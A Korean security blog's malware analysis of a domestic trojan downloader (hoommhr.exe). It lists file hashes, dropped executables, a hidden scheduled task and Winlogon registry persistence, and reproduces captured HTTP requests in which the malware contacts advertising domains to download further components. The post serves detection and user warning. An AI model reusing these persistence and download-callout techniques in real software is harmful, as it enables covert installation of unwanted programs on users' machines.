울지않는벌새 : Security, Movie & Society

국내 악성코드 : hoommhr.exe (Dr.Web : Trojan.DownLoader1.33073)

벌새::Analysis
국내에서 제작되어 특정 경로를 통해 유포되는 hoommhr.exe (SHA1 : 7a34ca57df1ecddaf8e4653c935aa8ce9e2be164) 파일에 대해 살펴보도록 하겠습니다.

해당 파일은 Dr.Web 보안 제품에서 Trojan.DownLoader1.33073 (VirusTotal : 3/42) 진단명으로 진단되고 있으므로 참고하시기 바랍니다.

[생성 파일 등록 및 진단 정보]

C:\WINDOWS\system32\ckdfsml.exe (SHA1 : e9cf06239c49ef8763b48af16926602223ad8d74)
 - AhnLab V3 : Trojan/Win32.Banload (VirusTotal : 8/41)

C:\WINDOWS\system32\fiylemo.exe (SHA1 : d1376c6f4cef8fda74fdde68a4ed9c51a4fcb688)
 - AhnLab V3 : Trojan/Win32.Banload (VirusTotal : 8/43)

C:\WINDOWS\system32\yerterfd4f.exe (SHA1 : 17bea265bad5229658d702392eb9591fe2b92646)
 - AhnLab V3 : Trojan/Win32.Banload (VirusTotal : 18/43)

C:\WINDOWS\Tasks\tiqzjtql.job :: 숨김(H) 속성


해당 악성코드는 시스템 폴더(%windir%\system32)에 yerterfd4f.exe 파일을 생성하며, 해당 파일은 추가적으로 ckdfsml.exe / fiylemo.exe 파일을 다운로드하도록 구성되어 있습니다.


또한 추가적으로 숨김(H) 속성으로 등록한 예약 작업(tiqzjtql.job)을 통해 ckdfsml.exe 파일을 실행하도록 구성되어 있는 것을 확인할 수 있습니다.

[ckdfsml.exe 파일 네트워크 연결 정보]

GET /ufnm/bbsq/bmfunbdr4.nedc HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
Host: top.smartwidget.net
Connection: Keep-Alive

[생성 레지스트리 등록 정보]

HKEY_CURRENT_USER\Software\Microsoft\Internet Connection Wizard\Views
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\DropDown
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\DropDown\Skins
 - base = tiqzjtql
 - NTDS = 28
 - Timeout = 1
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\View
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\View\Stream
 - beforeAg = fiylemo
 - TIDTD = 28
 - Timeout = 1
HKEY_CURRENT_USER\Software\Microsoft\NetUnit
HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon
 - Taskman = C:\WINDOWS\system32\fiylemo.exe

Windows 시작시 fiylemo.exe 파일을 시작 프로그램으로 등록하여 자동 실행되도록 구성되어 있습니다.

[fiylemo.exe 파일 네트워크 연결 정보]

GET /qms/a2/bnkmenes4.nmdr HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
Host: suv.smartbutton.kr
Connection: Keep-Alive

이렇게 사용자 몰래 설치된 파일들은 국내 광고 관련 도메인(ppot.smartwidget.net / iombe.smartwidget.net / izappy.net / top.smartwidget.net / suv.smartbutton.kr / mato.keywordhelper.net)으로 추정되는 외부 통신을 하는 것을 통해 추가적인 광고 프로그램 설치 또는 상업적 목적의 광고 생성 동작이 이루어질 수 있으리라 판단됩니다.

그러므로 자신이 설치하지 않은 프로그램이 시스템 시작시 자동 실행되는 등의 증상이 있는 분들은 신뢰할 수 있는 보안 제품을 이용하여 시스템 정밀 검사를 하시기 바랍니다.